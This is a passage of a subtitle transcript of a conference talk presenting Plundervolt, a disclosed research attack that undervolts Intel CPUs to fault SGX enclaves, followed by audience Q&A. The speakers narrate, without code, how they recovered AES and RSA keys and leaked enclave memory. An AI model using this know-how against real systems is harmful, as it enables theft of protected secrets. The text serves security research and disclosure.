00:28:26,620 --> 00:28:30,650
it so much easier. And again, thank you to
somebody on the Internet for having
318
00:28:30,650 --> 00:28:34,750
written a differential fault analysis
attack for me. You don't, you don't need
319
00:28:34,750 --> 00:28:39,470
two, but it just makes it easy for the
presentation. So I'm now going to compare.
320
00:28:39,470 --> 00:28:44,690
Let me just pause that a second, I used
somebody else's differential fault attack
321
00:28:44,690 --> 00:28:49,600
and it gave me in one, for the first pair
it gave me 500 possible keys and for the
322
00:28:49,600 --> 00:28:54,470
second it gave me 200 possible keys. I'm
overlapping them. And there was only one
323
00:28:54,470 --> 00:28:59,860
key that matched both. And that's the key
that came out. And let's just again check
324
00:28:59,860 --> 00:29:05,970
inside the source code, does that key
exist? What is the key? And yeah, that is
325
00:29:05,970 --> 00:29:09,590
the key. So, again what I've...
Daniel: That is not a very good key,
326
00:29:09,590 --> 00:29:14,210
though.
Kit: No, Ehhh... I think, if you think
327
00:29:14,210 --> 00:29:17,640
about randomness, it's as good as any
other. Anyway, ehhh...
328
00:29:17,640 --> 00:29:21,470
Laughter
Kit: What have I done? I have flipped a
329
00:29:21,470 --> 00:29:29,370
bit inside SGX to create a fault in AES
New Instruction set that has enabled me to
330
00:29:29,370 --> 00:29:33,870
get the AES key out of SGX. You shouldn't
be able to do that.
331
00:29:33,870 --> 00:29:40,070
Daniel: So. So now that we have multiple
attacks, we should think about a logo and
332
00:29:40,070 --> 00:29:43,280
a name, right?
Kit: This one better be good because the
333
00:29:43,280 --> 00:29:46,960
other one wasn't very good.
Daniel: No, seriously, we are already
334
00:29:46,960 --> 00:29:47,960
soon...
Kit: Okay.
335
00:29:47,960 --> 00:29:51,430
Daniel: We are, we will write this out.
Send this to a conference. People will
336
00:29:51,430 --> 00:29:56,510
like it, right. This is and I already have
a name and a logo for it. Kit: Come on
337
00:29:56,510 --> 00:29:59,350
then.
Daniel: Crypto Vault Screw Hammer.
338
00:29:59,350 --> 00:30:02,540
Laughter
Daniel: It's like, we attack crypto in a
339
00:30:02,540 --> 00:30:07,299
vault, SGX, and it's like a, like the
Clock screw and like Row hammer. And
340
00:30:07,299 --> 00:30:11,610
like...
Kit: I don't think that's very catchy. But
341
00:30:11,610 --> 00:30:19,840
let me tell you, it's not just crypto. So
we're faulting multiplication. So surely
342
00:30:19,840 --> 00:30:23,780
there's another use for this other than
crypto. And this is where something really
343
00:30:23,780 --> 00:30:27,890
interesting happens. For those of you who
are really good at C you can come and
344
00:30:27,890 --> 00:30:33,870
explain this to me later. This is a really
simple bit of C. All I'm doing is getting
345
00:30:33,870 --> 00:30:39,280
an offset of an array and taking the
address of that and putting it into a
346
00:30:39,280 --> 00:30:43,929
pointer. Why is this interesting? Hmmm,
It's interesting because I want to know
347
00:30:43,929 --> 00:30:47,800
what the compiler does with that. So I am
going to wave my magic wand and what the
348
00:30:47,800 --> 00:30:53,030
compiler is going to do is it's going to
make this. Why is that interesting?
349
00:30:53,030 --> 00:30:58,160
Daniel: Simple pointer arithmetic?
Kit: Hmmm. Well. we know that we can fault
350
00:30:58,160 --> 00:31:02,290
multiplications. So we're no longer
looking at crypto. We're now looking at
351
00:31:02,290 --> 00:31:08,860
just memory. So let's see if I can use
this as an attack. So let me try and
352
00:31:08,860 --> 00:31:12,580
explain what's going on here. On the right
hand side, you can see the undervolting.
353
00:31:12,580 --> 00:31:16,240
I'm going to create an enclave and I've
put it in debug mode so that I can see
354
00:31:16,240 --> 00:31:20,360
what's going on. You can see the size of
the enclave because we've got the base and
355
00:31:20,360 --> 00:31:28,750
the limit of it. And if we look at that in
a diagram, what that's saying is here. If
356
00:31:28,750 --> 00:31:34,780
I can write anything at the top above
that, that will no longer be encrypted,
357
00:31:34,780 --> 00:31:41,720
that will be unencrypted. Okay, let's
carry on with that. So, let's just write
358
00:31:41,720 --> 00:31:46,450
that one statement again and again, that
pointer arithmetic again and again and
359
00:31:46,450 --> 00:31:53,059
again whilst I'm undervolting and see what
happens. Oh, suddenly it changed and if
360
00:31:53,059 --> 00:31:57,560
you look at where it's mapped it to, it
has mapped that pointer to memory that is
361
00:31:57,560 --> 00:32:05,560
no longer inside SGX, it has put it into
untrusted memory. So we're just doing the
362
00:32:05,560 --> 00:32:10,420
same statement again and again whilst
undervolting. Besh, we've written
363
00:32:10,420 --> 00:32:14,630
something that was in the enclave out of
the enclave. And I'm just going to display
364
00:32:14,630 --> 00:32:19,350
the page of memory that we've got there to
show you what it was. And there's the one
365
00:32:19,350 --> 00:32:24,580
line, it's deadbeef And again, I'm just
going to look in my source code to see
366
00:32:24,580 --> 00:32:30,030
what it was. Yeah, it's, you know you
know, endianness blah, blah, blah. I have
367
00:32:30,030 --> 00:32:36,270
now not even used crypto. I have purely
used pointer arithmetic to take something
368
00:32:36,270 --> 00:32:43,140
that was stored inside Intel's SGX and
moved it into user space where anyone can
369
00:32:43,140 --> 00:32:46,380
read it.
Daniel: So, yes, I get your point. It's
370
00:32:46,380 --> 00:32:48,750
more than just crypto, right?
Kit: Yeah.
371
00:32:48,750 --> 00:32:57,490
Daniel: It's way beyond that. So we, we
leaked RSA keys. We leaked AES keys.
372
00:32:57,490 --> 00:33:01,260
Kit: Go on... Yeah, we did not just that
though we did memory corruption.
373
00:33:01,260 --> 00:33:06,340
Daniel: Okay, so. Yeah. Okay. Crypto Vault
Screw Hammer, point taken, is not the
374
00:33:06,340 --> 00:33:10,980
ideal name, but maybe you could come up
with something. We need a name and a logo.
375
00:33:10,980 --> 00:33:14,250
Kit: So pressures on me then. Right, here
we go. So it's got to be due to
376
00:33:14,250 --> 00:33:20,710
undervolting because we're undervolting.
Maybe we can get a pun on vault and volt
377
00:33:20,710 --> 00:33:26,370
in there somewhere. We're stealing
something, aren't we? We're corrupting
378
00:33:26,370 --> 00:33:30,590
something. Maybe. Maybe we're plundering
something.
379
00:33:30,590 --> 00:33:31,880
Daniel: Yeah?
Kit: I know.
380
00:33:31,880 --> 00:33:32,880
Daniel: No?
381
00:33:32,880 --> 00:33:37,250
Kit: Let's call it plunder volt.
Daniel: Oh, no, no, no. That's not it.
382
00:33:37,250 --> 00:33:38,309
That's not a good nane.
Kit: What?
383
00:33:38,309 --> 00:33:42,710
Daniel: That, no. We need something...
That's really not a good name. People will
384
00:33:42,710 --> 00:33:51,080
hate this name.
Kit: Wait, wait, wait, wait, wait.
385
00:33:51,080 --> 00:33:53,870
Daniel: No...
Laughter
386
00:33:53,870 --> 00:33:57,049
Kit: You can read this if you like,
Daniel.
387
00:33:57,049 --> 00:34:01,410
Daniel: Okay. I, I think I get it. I, I
think I get it.
388
00:34:01,410 --> 00:34:16,730
Kit: No, no, I haven't finished.
Laughter
389
00:34:16,730 --> 00:34:35,329
Daniel: Okay. Yeah, this is really also a
very nice comment. Yes. The quality of the
390
00:34:35,329 --> 00:34:37,659
videos, I think you did a very good job
there.
391
00:34:37,659 --> 00:34:40,879
Kit: Thank you.
Daniel: Also, the website really good job
392
00:34:40,879 --> 00:34:42,619
there.
Kit: So, just to summarize, what we've
393
00:34:42,619 --> 00:34:52,539
done with plunder volt is: It's a new type
of attack, it breaks the integrity of SGX.
394
00:34:52,539 --> 00:34:57,059
It's within SGX. We're doing stuff we
shouldn't be able to.
395
00:34:57,059 --> 00:35:01,050
Daniel: Like AES keys, we leak AES keys,
yeah.
396
00:35:01,050 --> 00:35:06,319
Kit: And we are retrieving the RSA
signature key.
397
00:35:06,319 --> 00:35:11,109
Daniel: Yeah. And yes, we induced memory
corruption in bug free code.
398
00:35:11,109 --> 00:35:20,019
Kit: And we made the Enclave write Secrets
to untrusted memory. This is the paper,
399
00:35:20,019 --> 00:35:27,609
that's been accepted next year. It is my
first paper, so thank you very much. Kit,
400
00:35:27,609 --> 00:35:29,930
that's me.
Applause
401
00:35:29,930 --> 00:35:38,950
Kit: Thank you. David Oswald, Flavio
Garcia, Jo Van Bulck and of course, the
402
00:35:38,950 --> 00:35:46,411
infamous and Frank Piessens. So all that
really remains for me to do is to say,
403
00:35:46,411 --> 00:35:49,499
thank you very much for coming...
Daniel: Wait a second, wait a second.
404
00:35:49,499 --> 00:35:53,440
There's one more thing, I think you
overlooked one of the tweets I added it
405
00:35:53,440 --> 00:35:56,509
here. You didn't see this slide yet?
Kit: I haven't seen this one.
406
00:35:56,509 --> 00:36:00,900
Daniel: This one, I really like it.
Kit: It's a slightly ponderous pun on
407
00:36:00,900 --> 00:36:06,329
Thunderbolt... pirate themed logo.
Daniel: A pirate themed logo. I really
408
00:36:06,329 --> 00:36:13,079
like it. And if it's a pirate themed logo,
don't you think there should be a pirate
409
00:36:13,079 --> 00:36:16,210
themed song?
Laughter
410
00:36:16,210 --> 00:36:25,349
Kit: Daniel, have you written a pirate
theme song? Go on then, play it. Let's,
411
00:36:25,349 --> 00:36:37,220
let's hear the pirate theme song.
music -- see screen --
412
00:36:37,220 --> 00:37:09,229
Music: ...Volt down me enclaves yo ho. Aye
but it's fixed with a microcode patch.
413
00:37:09,229 --> 00:37:30,369
Volt down me enclaves yo ho.
Daniel: Thanks to...
414
00:37:30,369 --> 00:37:43,869
Applause
Daniel: Thanks to Manuel Weber and also to
415
00:37:43,869 --> 00:37:47,480
my group at Theo Graz for volunteering for
the choir.
416
00:37:47,480 --> 00:37:51,980
Laughter
Daniel: And then, I mean, this is now the
417
00:37:51,980 --> 00:37:58,727
last slide. Thank you for your attention.
Thank you for being here. And we would
418
00:37:58,727 --> 00:38:02,369
like to answer questions in the Q&A
419
00:38:02,369 --> 00:38:07,079
Applause
420
00:38:07,079 --> 00:38:13,789
Herald: Thank you for your great talk. And
thank you some more for the song. If you
421
00:38:13,789 --> 00:38:18,720
have questions, please line up on the
microphones in the room. First question
422
00:38:18,720 --> 00:38:22,640
goes to the signal angel, any question
from the Internet?
423
00:38:22,640 --> 00:38:26,979
Signal-Angel: Not as of now, no.
Herald: All right. Then, microphone number
424
00:38:26,979 --> 00:38:29,800
4, your question please.
Microphone 4: Hi. Thanks for the great
425
00:38:29,800 --> 00:38:34,809
talk. So, why does this happen now? I
mean, thanks for the explanation for wrong
426
00:38:34,809 --> 00:38:38,440
number, but it wasn't clear. What's going
on there?
427
00:38:38,440 --> 00:38:46,890
Daniel: So, too, if you look at circuits
for the signal to be ready at the output,
428
00:38:46,890 --> 00:38:53,729
they need, electrons have to travel a bit.
If you increase the voltage, things will
429
00:38:53,729 --> 00:39:00,430
go faster. So they will, you will have the
output signal ready at an earlier point in
430
00:39:00,430 --> 00:39:05,089
time. Now the frequency that you choose
for your processor should be related to
431
00:39:05,089 --> 00:39:08,599
that. So if you choose the frequency too
high, the outputs will not be ready yet at
432
00:39:08,599 --> 00:39:13,319
this circuit. And this is exactly what
happens, if you reduce the voltage the
433
00:39:13,319 --> 00:39:17,489
outputs are not ready yet for the next
clock cycle.
434
00:39:17,489 --> 00:39:22,720
Kit: And interestingly, we couldn't fault
really short instructions. So anything
435
00:39:22,720 --> 00:39:26,400
like an add or an xor, it was basically
impossible to fault. So they had to be
436
00:39:26,400 --> 00:39:30,859
complex instructions that probably weren't
finishing by the time the next clock tick
437
00:39:30,859 --> 00:39:31,950
arrived.
Daniel: Yeah.
438
00:39:31,950 --> 00:39:35,580
Microphone 4: Thank you.
Herald: Thanks for your answer. Microphone
439
00:39:35,580 --> 00:39:38,960
number 4 again.
Microphone 4: Hello. It's a very
440
00:39:38,960 --> 00:39:45,160
interesting theoretical approach I think.
But you were capable to break these crypto
441
00:39:45,160 --> 00:39:53,049
mechanisms, for example, because you could
do zillions of iterations and you are sure
442
00:39:53,049 --> 00:39:57,930
to trigger the fault. But in practice,
say, as someone is having a secure
443
00:39:57,930 --> 00:40:03,859
conversation, is it practical, even close
to a possible too to break it with that?
444
00:40:03,859 --> 00:40:08,210
Daniel: It totally depends on your threat
model. So what can you do with the
445
00:40:08,210 --> 00:40:12,789
enclave? If you, we are assuming that we
are running with root privileges here and
446
00:40:12,789 --> 00:40:17,461
a root privileged attacker can certainly
run the enclave with certain inputs, again
447
00:40:17,461 --> 00:40:21,970
and again. If the enclave doesn't have any
protection against replay, then certainly
448
00:40:21,970 --> 00:40:25,759
we can mount an attack like that. Yes.
Microphone 4: Thank you.
449
00:40:25,759 --> 00:40:30,640
Herald: Signal-Angel your question.
Signal: Somebody asked if the attack only
450
00:40:30,640 --> 00:40:33,980
applies to Intel or to AMD or other
architectures as well.
451
00:40:33,980 --> 00:40:37,900
Kit: Oh, good question, I suspect right
now there are people trying this attack on
452
00:40:37,900 --> 00:40:41,599
AMD in the same way that when clock screw
came out, there were an awful lot of
453
00:40:41,599 --> 00:40:46,759
people starting to do stuff on Intel as
well. We saw the clock screw attack on ARM
454
00:40:46,759 --> 00:40:52,460
with frequency. Then we saw ARM with
voltage. Now we've seen Intel with
455
00:40:52,460 --> 00:40:57,369
voltage. And someone else has done similar
Volt pwn has done something very similar
456
00:40:57,369 --> 00:41:01,799
to us. And I suspect AMD is the next one.
I guess, because it's not out there as
457
00:41:01,799 --> 00:41:06,789
much. We've tried to do them in the order
of, you know, scaring people.
458
00:41:06,789 --> 00:41:10,130
Laughter
Kit: Scaring as many people as possible as
459
00:41:10,130 --> 00:41:13,789
quickly as possible.
Herald: Thank you for the explanation.
460
00:41:13,789 --> 00:41:18,319
Microphone number 4.
Microphone 4: Hi. Hey, great. Thanks for
461
00:41:18,319 --> 00:41:25,339
the representation. Can you get similar
results by Harrower? I mean by tweaking
462
00:41:25,339 --> 00:41:28,309
the voltage that you provide to the CPU
or...
463
00:41:28,309 --> 00:41:32,680
Kit: Well, I refer you to my earlier
answer. I know for a fact that there are
464
00:41:32,680 --> 00:41:37,099
people doing this right now with physical
hardware, seeing what they can do. Yes,
465
00:41:37,099 --> 00:41:40,569
and I think it will not be long before
that paper comes out.
466
00:41:40,569 --> 00:41:46,519
Microphone 4: Thank you.
Herald: Thanks. Microphone number one.
467
00:41:46,519 --> 00:41:51,150
Your question. Sorry, microphone 4 again,
sorry.
468
00:41:51,150 --> 00:41:57,920
Microphone 4: Hey, thanks for the talk.
Two small questions. One, why doesn't
469
00:41:57,920 --> 00:42:07,789
anything break inside SGX when you do
these tricks? And second one, why when you
470
00:42:07,789 --> 00:42:14,539
write outside the enclaves memory, their
value is not encrypted.
471
00:42:14,539 --> 00:42:21,839
Kit: So the enclave is an encrypted area
of memory. So when it points to an
472
00:42:21,839 --> 00:42:24,260
unencrypted, it's just
going to write it to the unencrypted
473
00:42:24,260 --> 00:42:28,650
memory. Does that make sense?
Daniel: From the enclaves perspective,
474
00:42:28,650 --> 00:42:33,079
none of the memory is encrypted. This is
just transparent to the enclave. So if the
475
00:42:33,079 --> 00:42:36,680
enclave will write to another memory
location. Yes, it just won't be encrypted.
476
00:42:36,680 --> 00:42:40,609
Kit Yeah. And what's happening is we're
getting flips in the registers. Which is
477
00:42:40,609 --> 00:42:44,079
why I think we're not getting an integrity
check because the enclave is completely
478
00:42:44,079 --> 00:42:48,150
unaware that anything's even gotten wrong.
It's got a value in its memory and it's
479
00:42:48,150 --> 00:42:51,230
gonna use it.
Daniel: Yeah. The integrity check is only
480
00:42:51,230 --> 00:42:55,210
on the on the memory that you logged from
RAM. Yeah.
481
00:42:55,210 --> 00:43:02,589
Herald: Okay, microphone number 7.
Microphone 7: Yeah. Thank you. Interesting
482
00:43:02,589 --> 00:43:11,950
work. I was wondering, you showed us the
example of the code that wrote outside the
483
00:43:11,950 --> 00:43:17,229
Enclave Memory using simple pointer
arithmetics. Have you been able to talk to
484
00:43:17,229 --> 00:43:23,559
Intel why this memory access actually
happens? I mean, you showed us the output
485
00:43:23,559 --> 00:43:28,569
of the program. It crashes, but
nevertheless, it writes the result to the
486
00:43:28,569 --> 00:43:34,469
resulting memory address. So there must be
something wrong, like the attack that
487
00:43:34,469 --> 00:43:39,979
happened two years ago at the Congress
about, you know, all that stuff.
488
00:43:39,979 --> 00:43:46,030
Daniel: So generally enclaves can read and
write any memory location in their host
489
00:43:46,030 --> 00:43:52,819
application. We have also published papers
that basically argued that this might not
490
00:43:52,819 --> 00:44:00,140
be a good idea, good design decision. But
that's the current design. And the reason
491
00:44:00,140 --> 00:44:04,849
is that this makes interaction with the
enclave very easy. You can just place your
492
00:44:04,849 --> 00:44:09,279
payload somewhere in the memory. Hand the
pointer to the enclave and the enclave can
493
00:44:09,279 --> 00:44:13,810
use the data from there, maybe copy it
into the enclave memory if necessary, or
494
00:44:13,810 --> 00:44:19,579
directly work on the data. So that's why
this memory access to the normal memory
495
00:44:19,579 --> 00:44:24,500
region is not illegal.
Kit: And if you want to know more, you can
496
00:44:24,500 --> 00:44:29,450
come and find Daniel afterwards.
Herald: Okay. Thanks for the answer.
497
00:44:29,450 --> 00:44:32,730
Signal-Angel, the questions from the
Internet.
498
00:44:32,730 --> 00:44:39,140
Signal-Angel: Yes. The question came up. If, how
stable the system you're attacking with
499
00:44:39,140 --> 00:44:42,150
the hammering
is while you're performing their attack.
500
00:44:42,150 --> 00:44:46,180
Kit: It's really stable. Once I've been
through three months of crashing the
501
00:44:46,180 --> 00:44:49,720
computer. I got to a point where I had a
really, really good frequency voltage
502
00:44:49,720 --> 00:44:55,520
combination. And we did discover on all
Intel chips, it was different. So even, on
503
00:44:55,520 --> 00:44:59,280
what looked like and we bought almost an
identical little nook, we bought one with
504
00:44:59,280 --> 00:45:05,670
exactly the same spec and it had a
different sort of frequency voltage model.
505
00:45:05,670 --> 00:45:09,719
But once we'd done this sort of
benchmarking, you could pretty much do any
506
00:45:09,719 --> 00:45:14,509
attack without it crashing at all.
Daniel: But without this benchmarking,
507
00:45:14,509 --> 00:45:17,729
it's true. We would often reboot.
Kit: That was a nightmare yeah, I wish I'd
508
00:45:17,729 --> 00:45:20,440
done that the beginning. It would've saved
me so much time.
509
00:45:20,440 --> 00:45:25,019
Herald: Thanks again for answering.
Microphone number 4 your question.
510
00:45:25,019 --> 00:45:29,260
Microphone 4: Can Intel fix this with a
microcode update?
511
00:45:29,260 --> 00:45:36,549
Daniel: So, there are different approaches
to this. Of course, the quick fix is to
512
00:45:36,549 --> 00:45:41,690
remove the access to the MSR, which is of
course inconvenient because you can't
513
00:45:41,690 --> 00:45:45,240
undervolt your system anymore. So maybe
you want to choose whether you want to use
514
00:45:45,240 --> 00:45:50,660
SGX or want to have a gaming computer
where you undervolt the system or control
515
00:45:50,660 --> 00:45:56,219
the voltage from software. But is this a
real fix? I don't know. I think there are
516
00:45:56,219 --> 00:45:58,729
more vectors, right?
Kit: Yeah.But, well I'll be interested to
517
00:45:58,729 --> 00:46:01,210
see what they're going to do with the next
generation of chips.
518
00:46:01,210 --> 00:46:04,609
Daniel: Yeah.
Herald: All right. Microphone number 7,
519
00:46:04,609 --> 00:46:08,859
what's your question?
Microphone 7: Yes, similarly to the other
520
00:46:08,859 --> 00:46:14,170
question, is there a way you can prevent
such attacks when writing code that runs
521
00:46:14,170 --> 00:46:17,820
in the secure enclave?
Kit: Well, no. That's the interesting
522
00:46:17,820 --> 00:46:22,739
thing, it's really hard to do. Because we
weren't writing code with bugs, we were
523
00:46:22,739 --> 00:46:26,999
just writing normal pointer arithmetic.
Normal crypto. If anywhere in your code,
524
00:46:26,999 --> 00:46:29,549
you're using a multiplication. It can be
attacked.
525
00:46:29,549 --> 00:46:34,750
Daniel: But of course, you could use fault
resistant implementations inside the
526
00:46:34,750 --> 00:46:39,160
enclave. Whether that is a practical
solution is yet to be determined
527
00:46:39,160 --> 00:46:41,859
Kit: Oh yes, yea, right, you could write
duplicate code and do comparison things
528
00:46:41,859 --> 00:46:46,829
like that. But if, yeah.
Herald: Okay. Microphone number 3. What's
529
00:46:46,829 --> 00:46:47,829
your question?
530
00:46:47,829 --> 00:46:53,390
Microphone 3: Hi. I can't imagine Intel
being very happy about this and recently
531
00:46:53,390 --> 00:46:57,450
they were under fire for how they were
handling a coordinated disclosure. So can
532
00:46:57,450 --> 00:47:01,299
you summarize experience?
Kit: They were... They were really nice.
533
00:47:01,299 --> 00:47:06,380
They were really nice. We disclosed really
early, like before we had all of the
534
00:47:06,380 --> 00:47:08,960
attacks.
Daniel: We just had a POC at that point.
535
00:47:08,960 --> 00:47:11,239
Kit: Yeah.
Daniel: Yeah, Simply POC. Very simple.
536
00:47:11,239 --> 00:47:14,890
Kit: They've been really nice. They wanted
to know what we were doing. They wanted to
537
00:47:14,890 --> 00:47:18,660
see all our attacks. I found them lovely.
Daniel: Yes.
538
00:47:18,660 --> 00:47:21,880
Kit: Am I allowed to say that?
Laughter
539
00:47:21,880 --> 00:47:24,859
Daniel: I mean, they also have interest
in...
540
00:47:24,859 --> 00:47:26,950
Kit: Yeah.
Daniel ...making these processes smooth.
541
00:47:26,950 --> 00:47:30,279
So that vulnerability researchers also
report to them.
542
00:47:30,279 --> 00:47:32,039
Kit: Yeah.
Daniel: Because if everyone says, oh this
543
00:47:32,039 --> 00:47:37,700
was awful, then they will also not get a
lot of reports. But if they do their job
544
00:47:37,700 --> 00:47:39,849
well and they did in our case.
Kit: Yeah.
545
00:47:39,849 --> 00:47:44,450
Daniel: Then of course, it's nice.
Herald: Okay. Microphone number 4...
546
00:47:44,450 --> 00:47:48,499
Danie: We even got a bug bounty.
Kit: We did get a bug bounty. I didn't
547
00:47:48,499 --> 00:47:51,499
want to mention that because I haven't
told my university yet.
548
00:47:51,499 --> 00:47:55,430
Laughter
Microphone 4: Thank you. Thank you for the
549
00:47:55,430 --> 00:48:01,799
funny talk. If I understood, you're right,
it means to really be able to exploit
550
00:48:01,799 --> 00:48:07,249
this. You need to do some benchmarking on
the machine that you want to exploit. Do
551
00:48:07,249 --> 00:48:15,239
you see any way to convert this to a
remote exploit? I mean, that to me, it
552
00:48:15,239 --> 00:48:19,650
seems you need physical access right now
because you need to reboot the machine.
553
00:48:19,650 --> 00:48:23,859
Kit: If you've done benchmarking on an
identical machine, I don't think you would
554
00:48:23,859 --> 00:48:27,039
have to have physical access.
Daniel: But you would have to make sure
555
00:48:27,039 --> 00:48:29,549
that it's really an identical machine.
Kit: Yeah.
556
00:48:29,549 --> 00:48:33,499
Daniel: But in the cloud you will find a
lot of identical machines.
557
00:48:33,499 --> 00:48:41,119
Laughter
Herald: Okay, microphone number 4 again.
558
00:48:41,119 --> 00:48:46,059
Daniel: Also, as we said, like the
temperature plays an important role.
559
00:48:46,059 --> 00:48:47,650
Kit: Yeah.
Daniel: You will also in the cloud find a
560
00:48:47,650 --> 00:48:52,390
lot of machines at similar temperatures
Kit: And there was, there is obviously
561
00:48:52,390 --> 00:48:55,569
stuff that we didn't show you. We did
start measuring the total amount of clock
562
00:48:55,569 --> 00:49:00,259
ticks it took to do maybe 10 RSA
encryption. And then we did start doing
563
00:49:00,259 --> 00:49:03,820
very specific timing attacks. But
obviously it's much easier to just do
564
00:49:03,820 --> 00:49:10,452
10000 of them and hope that one faults.
Herald: All right. Seems there are no
565
00:49:10,452 --> 00:49:13,940
further questions. Thank you very much for
your talk. For your research and for
566
00:49:13,940 --> 00:49:15,140
answering all the questions.
Applause
567
00:49:15,140 --> 00:49:18,529
Kit: Thank you.
Daniel: Thank you.
568
00:49:18,529 --> 00:49:22,479
postroll music
569
00:49:22,479 --> 00:49:48,000
subtitles created by c3subtitles.de
in the year 20??. Join, and help us!